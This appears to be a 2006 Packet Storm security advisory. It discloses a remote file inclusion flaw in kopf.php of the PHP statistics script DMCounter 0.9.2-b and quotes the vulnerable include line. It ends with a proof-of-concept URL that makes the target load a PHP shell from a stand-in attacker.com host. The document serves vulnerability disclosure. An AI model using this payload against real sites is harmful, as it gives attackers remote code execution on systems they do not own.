DMCounter092b.txt

2006-05-02T00:00:00
ID PACKETSTORM:46005
Type packetstorm
Reporter beford
Modified 2006-05-02T00:00:00

Description

                                        
                                            `Script: DMCounter  
Version: 0.9.2-b  
Language: PHP  
Problem: Remote File Include  
Vendor: http://sourceforge.net/projects/dmcounter  
Discovered by: beford <xbefordx gmail com>  
  
Description  
=============  
Statistics software based on PHP which does not require any database  
support but just uses flat files. Daily + monthly visits, which pages, from  
where, browsers and OSs are listed and visually presented  
  
Problem  
=============  
A remote user can supply a specially crafted URL to cause the target  
system to include and execute arbitrary PHP code from a remote  
location. A remote user can execute arbitrary PHP code and operating  
system commands on the target system with the privileges of the  
target web service.  
  
The vulnerable file is kopf.php  
  
1 <?php  
2 $basepath=getcwd();  
3 include($rootdir.'/lang.php');  
  
$rootdir is not being declared before using it in the include() function.  
  
  
Proof of Concept URL  
==============  
http://victim.com/dmcounter/kopf.php?rootdir=http://attacker.com/phpshell.txt?  
  
Greets:  
==============  
][GB][  
Zetha - http://odiameporsernegro.org  
uyx  
fallen - x33x37.org  
`